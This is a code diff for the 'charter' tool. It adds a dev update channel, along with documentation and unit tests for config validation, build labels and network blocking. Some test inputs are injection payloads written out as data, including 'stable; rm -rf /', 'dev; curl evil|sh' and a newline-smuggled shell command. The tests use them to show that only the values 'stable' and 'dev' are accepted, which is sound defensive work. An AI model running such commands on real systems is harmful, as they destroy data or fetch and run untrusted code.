+    partial fetch would hold a half-filled cache for a day. On the stable channel that
+    condition reads exactly as it always did — the PyPI call succeeded — because the head
+    is not fetched there at all.
+    """
+    from . import channel
+
+    dev = channel.is_dev()
+    latest = _fetch_latest()
+    head = _fetch_head() if dev else None
+    if latest is None and head is None:
+        return None
+    record = dict(load())
+    if latest is not None:
+        record["latest"] = latest
+    if head is not None:
+        record["head"] = head
+    if latest is not None and (head is not None or not dev):
+        record["ts"] = time.time()
     try:
         p = _cache_file()
         p.parent.mkdir(parents=True, exist_ok=True)
-        p.write_text(json.dumps({"latest": latest, "ts": time.time()}))
+        p.write_text(json.dumps(record))
     except OSError:
         return None
     return latest

--- a/docs/control-plane.md
+++ b/docs/control-plane.md
@@ -88,6 +88,13 @@ share = "local"                  # "local" | "commit" | "push". Default: "local"
 # no prior `charter workspace use`).
 [workspace]
 default = "default"              # Default: "default".
+
+# Which charter this plane tracks. Opt-in; absent, you track published releases.
+[update]
+channel = "stable"               # "stable" | "dev". Default: "stable". A CLOSED set:
+                                  # anything else is not sanitised, it is discarded, and
+                                  # the plane stays on "stable". See "The dev channel"
+                                  # below and docs/install.md.
 ```
 
 ### `group` vs `owner`
@@ -386,6 +393,43 @@ until it is resolved.
 verifies the target *before* writing the lock, so you cannot pin colleagues to a build you
 have not run; `--push` commits and pushes, and everyone conforms on their next session.
 charter only ever *shows* you that command — it never bumps on its own.
+
+## `[update].channel` — the dev channel
+
+**Opt-in.** Absent, this plane tracks published releases and nothing below applies.
+
+```toml
+[update]
+channel = "dev"
+```
+
+On `dev`, three things change and nothing else does:
+
+| | `stable` | `dev` |
+| --- | --- | --- |
+| "newer" means | a higher version is on PyPI | `main`'s head commit is not the one installed |
+| `charter update` installs | `charter-cp==<version>` | `git+https://github.com/diazoxide/charter@main` |
+| the status line's brand chip | `⬢ charter 0.51.0` | `⬢ charter 0.51.0 dev` |
+
+`charter update` on `dev` also force-refreshes the Claude Code plugin, because a
+version-keyed `claude plugin update` cannot see a change that does not move the version —
+see [install.md](install.md#the-plugin-needs-forcing-and-only-on-this-channel).
+
+**The value is a closed set of two, not a string.** `charter.toml` is committed: it arrives
+from a teammate's machine, and this key decides how charter installs itself. Anything that
+is not exactly `"stable"` or `"dev"` is discarded and the plane stays on `stable` — nothing
+you can write here is passed through to a URL, a command line, or an argv element. The
+repository charter installs from is a constant in charter's own source, and no `charter.toml`
+can name a different one.
+
+**Never both this and `[charter] version`.** A pin names a published release a whole team
+conforms to; a commit of `main` has no such number, and a dev build carries the *same*
+version number as the release it was built from — so a pin would silently reinstall the
+published wheel over it at every session start. Declare both and charter installs neither,
+and says which two keys disagree.
+
+**Nothing installs itself.** The status line nudges when `main` moves; you run `charter
+update`.
 
 ## Schema drift and healing
 

--- a/docs/install.md
+++ b/docs/install.md
@@ -125,7 +125,79 @@ run — charter fires twice on every SessionStart, UserPromptSubmit and Bash cal
 is wrong; everything is doubled, which is harder to notice. Delete charter's block from
 `config.toml` and keep the plugin.
 
-## First control plane## First control plane
+## 4. The dev channel — trying main without cutting a release
+
+**Opt-in, per control plane, one key.** Absent, nothing here happens and you track
+published releases as before.
+
+```toml
+[update]
+channel = "dev"     # "stable" (the default) | "dev"
+```
+
+A dev build is installed straight from git — never from PyPI:
+
+```bash
+uv tool install --force git+https://github.com/diazoxide/charter@main
+```
+
+`charter update` runs exactly that for you on a plane that declares the channel, and then
+does the two things a bare install does not: it moves this harness's charter artifact, and
+it force-refreshes the Claude Code plugin (see below for why that needs forcing).
+
+**Dev builds are never published, and that is the design rather than a limitation.** PyPI
+forbids local version identifiers, so a real dev release would have to burn `0.52.0.dev1`,
+`.dev2`, … permanently, at a rate of hundreds a month, irreversibly. And publishing on
+every push would mean running the release workflow — which holds `id-token: write` — on
+every merge, multiplying exactly the exposure that workflow is already being narrowed
+about. CI verifies the git install on every push to `main` instead: same coverage, no
+publish, no token.
+
+**Which channel you are on is on the status line.** The brand chip reads `⬢ charter 0.51.0
+dev`, so `↑a1b2c3d` beside it can only mean one thing — main moved. `charter --version`
+answers the other half, which is what you are actually running:
+
+```
+$ charter --version
+charter 0.51.0+dev (main @ a1b2c3d)      # a git install
+charter 0.51.0                            # a published one
+```
+
+That is read from the dist-info's PEP 610 `direct_url.json`, which a VCS install writes and
+a PyPI install does not — so it is the install itself talking, not a number somebody
+remembered to stamp.
+
+**Nothing installs itself.** When main is ahead, charter *nudges*; you run `charter
+update`. Auto-installing unreviewed merges is committed content reaching execution without
+a moment of consent, which is the one thing charter will not do to you.
+
+**A plane cannot ask for both a pin and the dev channel.** `[charter] version` names a
+published release the whole team conforms to; `main` has no such number. Declare both and
+charter installs neither, and says so at session start.
+
+**Going back** is one command — `charter update --to 0.51.0` installs the published release
+without editing anything — or delete the `[update]` block and run `charter update`.
+
+### The plugin needs forcing, and only on this channel
+
+`claude plugin update charter@charter` compares **version strings**, and the plugin's
+version moves once per release. The marketplace is a git clone of `main` that Claude Code
+re-fetches on its own, so between releases the clone moves and the installed copy does not,
+both still say `0.51.0`, and the update command correctly reports there is nothing to do.
+Measured on one machine: 45 files apart, `skills/secrets/SKILL.md` and
+`skills/browser/SKILL.md` among them.
+
+Hooks are unaffected — `hooks/hooks.json` invokes the `charter` on your `PATH`, so hook
+behaviour follows the CLI. **Skills are the part that goes stale**, and skills are text the
+model loads.
+
+So `charter update` on the dev channel uninstalls and reinstalls the plugin, which is the
+only mechanism that repopulates a version-keyed cache directory. And `charter doctor` now
+compares the two by **content** on *both* channels — a `plugin files` row that names the
+digests and the files that differ, because a version number that is frozen by design cannot
+answer the question.
+
+## First control plane
 
 ```bash
 mkdir my-control-plane && cd my-control-plane

--- a/docs/news/unreleased-a-dev-channel-that-publishes-nothing.md
+++ b/docs/news/unreleased-a-dev-channel-that-publishes-nothing.md
@@ -1,0 +1,111 @@
+---
+version: unreleased
+headline: A plane can track main without anyone cutting a release
+---
+
+Work lands on `main` and there is no way to try it. A release is a deliberate, joint event
+— tag, notes, PyPI, plugin, four version files in lockstep — and until one happens the only
+charter you can install is the last one. That is right for a release and wrong as the only
+way to run new code.
+
+**A control plane can now opt into the dev channel, one key, per plane:**
+
+```toml
+[update]
+channel = "dev"     # "stable" (the default) | "dev"
+```
+
+Three things change on `dev` and nothing else does:
+
+- **"Newer" means main's head commit is not the one you are running**, instead of "a higher
+  version is on PyPI".
+- **`charter update` installs from git** — `uv tool install --force
+  git+https://github.com/diazoxide/charter@main` — and then moves this harness's charter
+  artifact and force-refreshes the Claude Code plugin.
+- **The status line's brand chip says so:** `⬢ charter 0.51.0 dev`, so the `↑a1b2c3d`
+  beside it can only mean one thing.
+
+**Dev builds are never published, and that is the design.** PyPI forbids local version
+identifiers, so real dev releases would have to burn `0.52.0.dev1`, `.dev2`, … permanently,
+at a rate of hundreds a month, irreversibly — a namespace you cannot take back. And
+publishing on every merge means running the release workflow on every merge, and that
+workflow holds `id-token: write` alongside unpinned third-party actions (#443). Publishing
+on every commit would multiply exactly the exposure that issue is open about. So nothing is
+published: CI installs `git+…@main` on every push to `main`, checks the installed `charter
+--version` runs, and holds no `id-token` at all. The same coverage, without the artifact.
+
+**`charter --version` tells you which build you are on, and it is the install talking.**
+
+```
+charter 0.51.0+dev (main @ a1b2c3d)      # installed from git
+charter 0.51.0                            # installed from PyPI
+```
+
+That comes from PEP 610: an installer resolving a *direct URL* writes `direct_url.json`
+into the dist-info recording the URL and the exact commit; an installer resolving from an
+index writes no such file. So the file's **absence** is the positive statement "this came
+from PyPI", which is what lets charter identify a dev build without stamping anything at
+build time — and it has to, because there is no version number to stamp. Every way that can
+degrade prints something rather than raising: a checkout with no dist-info, a torn or
+hand-edited one, a `vcs_info` with no commit, a non-git direct URL (`+local`).
+
+**Nothing installs itself.** When main is ahead, charter nudges and you type `charter
+update`. Auto-installing unreviewed merges is committed content reaching execution without
+a moment of consent, which is the shape of the defect #453 is open about, and it is not
+something charter is going to do to you on the way to being convenient.
+
+**The channel is a closed set of two, not a string.** `charter.toml` is committed — it
+arrives from someone else's machine — and this key decides how charter installs itself.
+Anything that is not exactly `stable` or `dev` is discarded and the plane stays on
+`stable`; the repository charter installs from is a constant in charter's own source, and
+no `charter.toml` can name a different one. That is not caution for its own sake. `[frame]
+hotkey` reached tmux config text where a newline achieved code execution at launch, and a
+committed `mcp.json` key currently injects YAML (#453). This would have been the third
+door, and the one that installs software.
+
+**A pin and the dev channel are refused together.** `[charter] version` names a published
+release the whole team conforms to, and a dev build carries the *same* version number as
+the release it was built from — so the session-start conformance would have reinstalled the
+published wheel over your dev build, every session, and the version comparison would never
+have noticed. charter now installs neither and names the two keys that disagree.
+
+---
+
+## The plugin was stale on every plane, and nothing said so
+
+Separate from the channel, and live on **both** of them.
+
+`claude plugin update charter@charter` compares **version strings**. charter's plugin
+version moves exactly once per release. The marketplace is a git clone of `main` that
+Claude Code re-fetches on its own — so between releases the clone advances, the installed
+copy does not, both go on saying `0.51.0`, and the update command correctly answers *already
+at the latest version*. Measured on one machine: **45 files apart**, with
+`skills/secrets/SKILL.md` and `skills/browser/SKILL.md` among them.
+
+**Hooks were never affected.** `hooks/hooks.json` invokes `charter hook …` — the *command*,
+resolved from `PATH`, i.e. the `uv tool` install — so hook behaviour follows the CLI and
+not the plugin's bundled copy of `charter/*.py`. The staleness that bites is the **skills**,
+which are text the model loads: a stale one is wrong instructions delivered confidently.
+
+Two answers:
+
+- **`charter doctor` has a new `plugin files` row** that compares the installed cache
+  against the marketplace clone by content — a digest over the directories a plugin
+  actually loads (`.claude-plugin/`, `hooks/`, `skills/`, and `commands/`/`agents/` if they
+  ever appear), so churn in `tests/` and `docs/` is not reported as a stale plugin. It names
+  the digests and the first files that differ.
+- **`charter update` on the dev channel force-refreshes the plugin**, because a
+  version-keyed update cannot see a change that does not move the version. Uninstall +
+  reinstall is the mechanism, in that order and after `claude plugin marketplace update` —
+  verified end to end: `install` alone against an already-installed plugin answers *already
+  installed* and leaves the cache untouched, and without the marketplace step the reinstall
+  faithfully re-copies the same stale content.
+
+The severity differs by channel, on purpose. The clone tracks `main`, so *some* drift is the
+steady state for every stable plane from the day after a release onward — warning about it
+would put a permanent yellow row in front of everyone whose only honest fix is "wait for the
+next release". On `stable` the row stays green and says what it found; on `dev` it warns,
+because there the plane asked to track `main` and its plugin is not.
+
+Nothing to adopt for the plugin row — `charter doctor` reports it from this version on. For
+the channel: add the two lines to your `charter.toml` and run `charter update`.

--- a/tests/test_dev_channel.py
+++ b/tests/test_dev_channel.py
@@ -54,6 +54,66 @@ def git_build(commit="abc1234def5678901234567890123456789abcde", ref="main"):
     return {"url": "https://github.com/diazoxide/charter", "vcs_info": info}
 
 
+class NetworkReached(BaseException):
+    """Raised by :class:`NoNetwork` when the code under test tries to reach the network.
+
+    **A `BaseException`, and that is the entire point of this class existing.**
+    `update._fetch_head` and `_fetch_latest` both catch bare ``Exception`` — deliberately,
+    because a failed background check must never break a render — and ``AssertionError``
+    *is* an ``Exception``. The first version of this guard raised one, so every refusal was
+    swallowed by the very code it was guarding: the guard reported green while the call
+    happened. What actually reddened the mutation that added a live GET to the render path
+    was a different test class making a REAL request to api.github.com, which means the
+    invariant was pinned by network access rather than by the guard, and would have gone
+    unpinned on an offline machine or a restricted runner.
+
+    Nothing in charter catches ``BaseException``, so nothing can swallow this.
+    """
+
+
+class NoNetwork:
+    """Mixin: for the length of every test in the class, the network refuses and records.
+
+    Both halves are load-bearing. The **raise** is what fails a test loudly at the moment
+    of the call. The **record** is what fails it even if some future ``except
+    BaseException`` swallowed the raise — belt and braces on a guard whose whole history is
+    a swallowed exception.
+
+    Blocking the network itself rather than counting calls to one function is deliberate:
+    a counter on `Path.stat` once missed an `open()`, a `subprocess.run` and the deletion
+    of the very gate it claimed to pin. Every route out is patched — both socket
+    constructors and both urllib entry points above them — so a call added anywhere under
+    the code under test, through any library, is caught.
+
+    `subprocess.Popen` is NOT blocked: the detached refresh is not a violation of the rule,
+    it is the mechanism that keeps it. Tests that care stub it themselves.
+    """
+
+    _ROUTES = ("socket.socket", "socket.create_connection",
+               "urllib.request.urlopen", "urllib.request.urlretrieve")
+
+    def setUp(self):
+        super().setUp()
+        #: Every network call ATTEMPTED, recorded before the refusal is raised.
+        self.requested: list[str] = []
+        for route in self._ROUTES:
+            self.enterContext(mock.patch(route, self._refuse(route)))
+        # Automatic, so a test added to one of these classes later is covered without
+        # anybody remembering to assert it. A test that legitimately provokes the block
+        # clears the list itself.
+        self.addCleanup(self._assert_quiet)
+
+    def _refuse(self, route):
+        def boom(*a, **kw):
+            self.requested.append(f"{route}({a[0] if a else ''})")
+            raise NetworkReached(route)
+        return boom
+
+    def _assert_quiet(self):
+        self.assertEqual(self.requested, [],
+                         "the code under test reached the network")
+
+
 class TheChannelIsAClosedSet(unittest.TestCase):
     """`instance.update_of` is the whole boundary. Everything downstream compares."""
 
@@ -273,6 +333,41 @@ class VersionAlwaysPrints(unittest.TestCase):
         self.assertIn("charter", p.stdout)
         self.assertIn(__version__, p.stdout)
 
+    def test_building_the_parser_does_not_read_the_dist_info(self):
+        """`--version` is a lazy argparse action, and this is the only thing pinning it.
+
+        `build_parser()` runs on EVERY charter invocation — every hook, every status line
+        render, several per turn. argparse's own `action="version"` takes a FINISHED string
+        at `add_argument` time, so resolving the build label there would put a dist-info
+        read on several hundred paths to serve one. Three separate docstrings claim this
+        laziness; nothing measured it, so reverting to `action="version"` was free.
+        """
+        from charter import cli
+        channel._reset_cache_for_tests()
+        self.addCleanup(channel._reset_cache_for_tests)
+        with mock.patch.object(channel, "_read_direct_url",
+                               return_value=git_build()) as reader:
+            cli.build_parser()
+        self.assertEqual(reader.call_count, 0,
+                         "building the parser read the dist-info — --version is not lazy")
+
+    def test_asking_for_the_version_does_read_it(self):
+        """The other half: lazy must not mean never. Without this, deleting the read
+        altogether would satisfy the test above."""
+        from charter import cli
+        parser = cli.build_parser()
+        channel._reset_cache_for_tests()
+        self.addCleanup(channel._reset_cache_for_tests)
+        out = io.StringIO()
+        with mock.patch.object(channel, "_read_direct_url",
+                               return_value=git_build()) as reader, \
+                contextlib.redirect_stdout(out):
+            with self.assertRaises(SystemExit) as exit_code:
+                parser.parse_args(["--version"])
+        self.assertEqual(exit_code.exception.code, 0)
+        self.assertEqual(reader.call_count, 1)
+        self.assertIn("+dev (main @ abc1234)", out.getvalue())
+
     def test_a_stable_install_still_prints_exactly_one_word_after_the_name(self):
         """`commands_update._handoff` verifies an install by comparing `charter
         --version`'s LAST WORD to the version it asked for. A suffix on the stable path
@@ -281,8 +376,16 @@ class VersionAlwaysPrints(unittest.TestCase):
             self.assertEqual(f"charter {channel.build_label()}".split()[-1], __version__)
 
 
-class NewerMeansSomethingElseOnDev(PersonaIso):
-    """`update.newer_than` — the cache-only read the status line makes every turn."""
+class NewerMeansSomethingElseOnDev(NoNetwork, PersonaIso):
+    """`update.newer_than` — the cache-only read the status line makes every turn.
+
+    `NoNetwork` is on this class and not only on the render-path class below, and it was
+    added here for a specific reason: this class used to catch "a live GET was added to
+    `newer_head`" by **actually making the request**, returning a real commit from
+    api.github.com. That is not a test passing, it is a test being lucky in a machine with
+    a network. With the block installed the same mutation fails here offline, for the right
+    reason.
+    """
 
     def _cache(self, **record) -> None:
         p = update._cache_file()
@@ -336,31 +439,17 @@ class NewerMeansSomethingElseOnDev(PersonaIso):
             self.assertIsNone(update.newer_than(__version__))
 
 
-class TheRenderPathNeverReachesTheNetwork(PersonaIso):
+class TheRenderPathNeverReachesTheNetwork(NoNetwork, PersonaIso):
     """The rule `charter.update`'s module docstring opens with, enforced rather than read.
 
-    The bound is deliberately NOT a counter on one function. A counter on `Path.stat` once
-    missed an `open()`, a `subprocess.run` and the deletion of the very gate it claimed to
-    pin. What is blocked here is the network itself — every socket constructor and the
-    urllib entry point above them — so a call added ANYWHERE under `_brand()`, through any
-    library, fails loudly instead of quietly reaching PyPI or api.github.com from a test
-    run on somebody's laptop.
+    `NoNetwork` supplies the block and the automatic "nothing was requested" assertion; see
+    that class and :class:`NetworkReached` for why the refusal is a `BaseException`, which
+    is the difference between this guard working and this guard being decorative.
 
-    `subprocess.Popen` is stubbed rather than blocked: the detached refresh is not a
+    `subprocess.Popen` is stubbed here rather than blocked: the detached refresh is not a
     violation of the rule, it is the mechanism that keeps it. What the stub pins is that
     the refresh is the ONLY way out, and that it is never waited on.
     """
-
-    def _blocked(self):
-        def boom(*a, **kw):
-            raise AssertionError("the status line's render path made a network call")
-
-        return (
-            mock.patch("socket.socket", boom),
-            mock.patch("socket.create_connection", boom),
-            mock.patch("urllib.request.urlopen", boom),
-            mock.patch("urllib.request.urlretrieve", boom),
-        )
 
     def _render_brand(self, cache: dict, cfg: dict, doc):
         p = update._cache_file()
@@ -368,8 +457,6 @@ class TheRenderPathNeverReachesTheNetwork(PersonaIso):
         p.write_text(json.dumps(cache))
         spawned = []
         with contextlib.ExitStack() as stack:
-            for patcher in self._blocked():
-                stack.enter_context(patcher)
             stack.enter_context(mock.patch.object(
                 update.subprocess, "Popen",
                 side_effect=lambda *a, **kw: spawned.append(a) or mock.Mock()))
@@ -541,13 +628,58 @@ class TheBackgroundFetchIsWhereTheNetworkLives(PersonaIso):
         self.assertEqual(len(calls), 1)
 
 
-class NoTestHereOpensASocket(unittest.TestCase):
-    """A guard on the guards. If `socket.socket` is reachable in this module's tests, the
-    blocks above are patching something the code under test does not use."""
+class TheBlockItselfIsNotDecorative(NoNetwork, unittest.TestCase):
+    """A positive control on :class:`NoNetwork`. Without one, a guard that stopped guarding
+    reads exactly like a guard that has nothing to catch — which is what happened.
 
-    def test_socket_is_the_thing_being_blocked(self):
-        self.assertTrue(hasattr(socket, "socket"))
-        self.assertTrue(hasattr(socket, "create_connection"))
+    Every test here provokes the block deliberately and clears the record afterwards, so
+    the mixin's automatic "nothing was requested" cleanup does not fire on them.
+    """
+
+    def test_urlopen_is_refused_and_recorded(self):
+        import urllib.request
+        with self.assertRaises(NetworkReached):
+            urllib.request.urlopen("https://example.invalid/never")
+        self.assertTrue(self.requested)
+        self.requested.clear()
+
+    def test_an_except_exception_handler_cannot_swallow_the_refusal(self):
+        """The shape of `update._fetch_head`'s own guard, spelled out.
+
+        This is the assertion that would have failed on the first version of this block,
+        which raised `AssertionError`. `except Exception` caught it, `_fetch_head` returned
+        `None`, and the render-path class went green over a live GET.
+        """
+        import urllib.request
+        swallowed = True
+        try:
+            urllib.request.urlopen("https://example.invalid/never")
+        except Exception:                      # noqa: BLE001 — the point of the test
+            swallowed = True
+        except NetworkReached:
+            swallowed = False
+        self.assertFalse(swallowed, "`except Exception` swallowed the block — it is inert")
+        self.requested.clear()
+
+    def test_the_socket_constructors_are_refused_too(self):
+        """urllib is not the only way out. `http.client`, `ssl` and anything vendored
+        underneath them all end at a socket."""
+        for call in (lambda: socket.socket(), lambda: socket.create_connection(("x", 1))):
+            with self.assertRaises(NetworkReached):
+                call()
+        self.assertEqual(len(self.requested), 2)
+        self.requested.clear()
+
+    def test_the_recorder_runs_before_the_raise(self):
+        """The belt half of belt and braces: if some future `except BaseException` did
+        swallow the refusal, the recorded list is what still fails the test."""
+        import urllib.request
+        try:
+            urllib.request.urlopen("https://example.invalid/never")
+        except BaseException:                  # noqa: BLE001 — simulating the bad catcher
+            pass
+        self.assertEqual(len(self.requested), 1)
+        self.requested.clear()
 
 
 if __name__ == "__main__":

--- a/tests/test_dev_channel.py
+++ b/tests/test_dev_channel.py
@@ -1,0 +1,554 @@
+"""The dev release channel: opting in, saying so, and what "newer" then means.
+
+Three separate properties live here, and they fail in three different ways:
+
+1. **`[update] channel` is a closed enum at the config boundary.** `charter.toml` is
+   COMMITTED — it arrives from someone else's machine — and this value decides how charter
+   installs itself. charter has already been bitten twice by a committed value reaching a
+   parser (`[frame] hotkey` into tmux config text; a committed `mcp.json` key into YAML,
+   #453). The tests below are written to fail if the closed set is ever relaxed into a
+   sanitiser, and to fail if any operator-supplied string reaches an argv.
+2. **A dev build can say it is one**, through PEP 610 `direct_url.json`, with every
+   degradation handled — because the caller of last resort is `charter --version`, which
+   must always print something.
+3. **"Newer" changes meaning, and nothing else does.** Same cache, same TTL, same spawn
+   cooldown, and above all still no network call on the status line's render path.
+
+Nothing here touches the network. `urllib` is blocked outright in the render-path test
+rather than merely unstubbed, so a future call added anywhere under `_brand()` fails
+loudly instead of quietly reaching PyPI from a test run.
+"""
+
+from __future__ import annotations
+
+import contextlib
+import io
+import json
+import socket
+import unittest
+from unittest import mock
+
+from charter import __version__, channel, config, instance, statusline, update
+from tests._isolation import PersonaIso
+
+
+@contextlib.contextmanager
+def build(doc):
+    """Pretend this interpreter's install recorded *doc* as its PEP 610 direct_url.json.
+
+    Patches the uncached reader AND clears the memo on both sides. The memo is what keeps
+    a dist-info read off the status line's per-turn render path, and a test that patched
+    only the reader would either see a previous test's answer or leave its own behind for
+    the next one — a cross-test leak that reads as a flaky assertion about versions.
+    """
+    channel._reset_cache_for_tests()
+    with mock.patch.object(channel, "_read_direct_url", return_value=doc):
+        yield
+    channel._reset_cache_for_tests()
+
+
+def git_build(commit="abc1234def5678901234567890123456789abcde", ref="main"):
+    info = {"vcs": "git", "commit_id": commit}
+    if ref is not None:
+        info["requested_revision"] = ref
+    return {"url": "https://github.com/diazoxide/charter", "vcs_info": info}
+
+
+class TheChannelIsAClosedSet(unittest.TestCase):
+    """`instance.update_of` is the whole boundary. Everything downstream compares."""
+
+    def test_an_absent_section_is_the_stable_channel(self):
+        self.assertEqual(instance.update_of({}), {"channel": "stable"})
+
+    def test_the_declared_dev_channel_is_honoured(self):
+        self.assertEqual(instance.update_of({"update": {"channel": "dev"}})["channel"], "dev")
+
+    def test_the_value_returned_is_charters_own_constant_not_the_files_string(self):
+        """The guarantee is structural, not a promise about `tomllib`'s output.
+
+        A caller that receives the very object a committed file supplied is a caller that
+        could be the place a subclass with a surprising `__str__`, or a value carrying
+        anything at all, gets interpolated. Identity — not equality — is what says the
+        object crossing this boundary is one of the two charter wrote itself.
+
+        Fails if `update_of` is ever "simplified" to `out[key] = value` after checking
+        membership, which passes every equality assertion in this class.
+        """
+        supplied = "".join(["d", "e", "v"])          # equal to "dev", not the same object
+        self.assertIsNot(supplied, instance.UPDATE_CHANNELS[1])
+        got = instance.update_of({"update": {"channel": supplied}})["channel"]
+        self.assertIs(got, instance.UPDATE_CHANNELS[1])
+
+    def test_every_way_of_getting_it_wrong_lands_on_stable(self):
+        """One direction only, and it is the conservative one: stable installs a published
+        release, dev installs whatever `main` says this minute.
+
+        The newline payload is the `[frame] hotkey` incident's exact shape — a value that
+        ends one line and starts another. It is here because that is how the last one got
+        in, not because a newline is special: the point is that NO string survives.
+        """
+        for value in ("Dev", "DEV", " dev", "dev ", "dev\nrun-shell 'touch /tmp/PWNED'",
+                      "stable; rm -rf /", "", "latest", "main", "git+https://evil/x@main",
+                      "../../etc", 1, 0, True, False, None, ["dev"], {"channel": "dev"},
+                      3.5):
+            with self.subTest(value=value):
+                got = instance.update_of({"update": {"channel": value}})
+                self.assertEqual(got["channel"], "stable")
+
+    def test_a_section_that_is_not_a_section_degrades_rather_than_raising(self):
+        """`instance` is imported by every command including `charter --version`, so a
+        hand-edited charter.toml must never crash import."""
+        for section in ("dev", ["dev"], 7, None, True):
+            with self.subTest(section=section):
+                self.assertEqual(instance.update_of({"update": section})["channel"], "stable")
+
+    def test_the_defaults_view_and_the_fields_table_cannot_drift(self):
+        """The `FRAME_FIELDS` shape's whole reason for existing: one structure, so a key
+        added to a defaults dict and forgotten in a spellings dict is impossible."""
+        self.assertEqual(set(instance.UPDATE_DEFAULTS), set(instance.UPDATE_FIELDS))
+        self.assertEqual(instance.UPDATE_DEFAULTS["channel"], "stable")
+        self.assertEqual(instance.UPDATE_FIELDS["channel"][1], "channel")
+
+    def test_stable_is_the_first_channel_and_dev_the_second(self):
+        """`UPDATE_CHANNELS[0]` is the default and the fallback; the order is load-bearing
+        for the identity assertion above, which names `[1]`."""
+        self.assertEqual(instance.UPDATE_CHANNELS, ("stable", "dev"))
+
+
+class TheChannelReachesConfig(PersonaIso):
+    """`config.UPDATE` is derived from the plane's own charter.toml, like `config.FRAME`."""
+
+    def _declare(self, text: str) -> None:
+        (self.tmp / "charter.toml").write_text(text)
+        config.use(self.tmp)
+
+    def test_a_plane_that_declares_dev_derives_dev(self):
+        self._declare('schema = 1\n[update]\nchannel = "dev"\n')
+        self.assertEqual(config.UPDATE, {"channel": "dev"})
+        self.assertTrue(channel.is_dev())
+
+    def test_a_plane_that_declares_nothing_is_stable(self):
+        self._declare("schema = 1\n")
+        self.assertEqual(config.UPDATE, {"channel": "stable"})
+        self.assertFalse(channel.is_dev())
+
+    def test_a_hostile_declaration_is_stable_and_the_cli_still_runs(self):
+        self._declare('schema = 1\n[update]\nchannel = "dev\\nrun-shell x"\n')
+        self.assertEqual(config.UPDATE, {"channel": "stable"})
+        self.assertFalse(channel.is_dev())
+
+    def test_update_is_one_of_the_settings_the_test_harness_isolates(self):
+        """`config.DERIVED` is the source of truth for what `config.use` swaps, and the
+        reason `tests/_isolation.py` asks it rather than copying a list: four settings once
+        went missing from a hand-copied harness and the suite wrote into a developer's real
+        `.charter/`. A setting absent from `DERIVED` is a setting a test cannot isolate."""
+        self.assertIn("UPDATE", config.DERIVED)
+
+
+class TheChannelIsRematchedInProcess(unittest.TestCase):
+    """`config.UPDATE` is a module attribute; anything in-process can assign it.
+
+    `channel.channel()` re-matches against the closed set rather than trusting what it
+    finds there, so the two-constant guarantee holds for every reader of `channel()` and
+    not only for planes whose value happened to come through `update_of`.
+    """
+
+    def test_a_hostile_value_planted_on_config_still_reads_as_stable(self):
+        with mock.patch.object(config, "UPDATE", {"channel": "dev; curl evil|sh"}):
+            self.assertEqual(channel.channel(), "stable")
+            self.assertFalse(channel.is_dev())
+
+    def test_a_missing_or_malformed_config_attribute_reads_as_stable(self):
+        for planted in (None, "dev", ["dev"], {}, {"channel": None}):
+            with self.subTest(planted=planted):
+                with mock.patch.object(config, "UPDATE", planted):
+                    self.assertEqual(channel.channel(), "stable")
+
+    def test_a_declared_dev_value_is_honoured(self):
+        with mock.patch.object(config, "UPDATE", {"channel": "dev"}):
+            self.assertTrue(channel.is_dev())
+
+
+class TheBuildSaysWhatItIs(unittest.TestCase):
+    """PEP 610: a VCS install writes `direct_url.json`, a PyPI install writes none at all.
+
+    The ABSENCE is the positive statement "this came from PyPI", which is what lets charter
+    identify a dev build without stamping anything at build time — and it must be, because
+    dev builds are never published: PyPI forbids local version identifiers, so a real dev
+    release would burn `0.52.0.dev1`, `.dev2`, … permanently and irreversibly.
+    """
+
+    def test_no_direct_url_is_a_pypi_install_and_prints_the_bare_version(self):
+        with build(None):
+            self.assertEqual(channel.build_label(), __version__)
+            self.assertIsNone(channel.installed_commit())
+
+    def test_a_git_install_names_the_ref_and_the_short_commit(self):
+        with build(git_build()):
+            self.assertEqual(channel.build_label(), f"{__version__}+dev (main @ abc1234)")
+            self.assertEqual(channel.installed_ref(), "main")
+            self.assertTrue(channel.installed_commit().startswith("abc1234"))
+
+    def test_a_git_install_with_no_requested_revision_drops_the_ref(self):
+        """`requested_revision` is optional in PEP 610 — `pip install git+…` with no `@ref`
+        records only the commit. Printing `main` there would be a guess printed as a fact."""
+        with build(git_build(ref=None)):
+            self.assertEqual(channel.build_label(), f"{__version__}+dev (abc1234)")
+            self.assertIsNone(channel.installed_ref())
+
+    def test_a_vcs_record_with_no_commit_still_reads_as_a_dev_build(self):
+        doc = {"url": "https://github.com/diazoxide/charter",
+               "vcs_info": {"vcs": "git", "requested_revision": "main"}}
+        with build(doc):
+            self.assertEqual(channel.build_label(), f"{__version__}+dev")
+            self.assertIsNone(channel.installed_commit())
+
+    def test_a_non_git_direct_url_is_local_rather_than_dev_or_pypi(self):
+        """`uv tool install .` from a checkout, or a wheel installed by path. Not from
+        PyPI, so plain `0.51.0` would claim a provenance it does not have; no commit
+        either, so `+dev (…)` would be a name for something with no name."""
+        with build({"url": "file:///tmp/charter", "dir_info": {}}):
+            self.assertEqual(channel.build_label(), f"{__version__}+local")
+            self.assertIsNone(channel.installed_commit())
+
+    def test_a_non_git_vcs_is_not_treated_as_git(self):
+        with build({"url": "hg+https://x/y", "vcs_info": {"vcs": "hg", "commit_id": "1"}}):
+            self.assertEqual(channel.build_label(), f"{__version__}+local")
+            self.assertIsNone(channel.installed_commit())
+
+    def test_every_malformed_record_degrades_and_none_of_them_raise(self):
+        """`--version` must always print something. Each of these is a state that happens:
+        a half-written dist-info, a hand-edited one, JSON that is not an object."""
+        for doc in (None, {}, {"url": "x"}, {"vcs_info": "git"}, {"vcs_info": []},
+                    {"vcs_info": {"vcs": "git", "commit_id": 7}},
+                    {"vcs_info": {"vcs": "git", "commit_id": "   "}}):
+            with self.subTest(doc=doc):
+                with build(doc):
+                    self.assertIn(__version__, channel.build_label())
+
+    def test_an_unreadable_dist_info_is_none_rather_than_an_exception(self):
+        """The real reader, not the stub: `Distribution.from_name` raises
+        `PackageNotFoundError` when running from a checkout with nothing installed, and
+        raises other things when a dist-info is half-written."""
+        channel._reset_cache_for_tests()
+        self.addCleanup(channel._reset_cache_for_tests)
+        with mock.patch("importlib.metadata.Distribution.from_name",
+                        side_effect=RuntimeError("torn dist-info")):
+            self.assertIsNone(channel._read_direct_url())
+
+    def test_non_json_content_is_none_rather_than_an_exception(self):
+        channel._reset_cache_for_tests()
+        self.addCleanup(channel._reset_cache_for_tests)
+        for raw in ("", "not json", "[1,2]", "null", "7"):
+            with self.subTest(raw=raw):
+                dist = mock.Mock()
+                dist.read_text.return_value = raw
+                with mock.patch("importlib.metadata.Distribution.from_name",
+                                return_value=dist):
+                    self.assertIsNone(channel._read_direct_url())
+
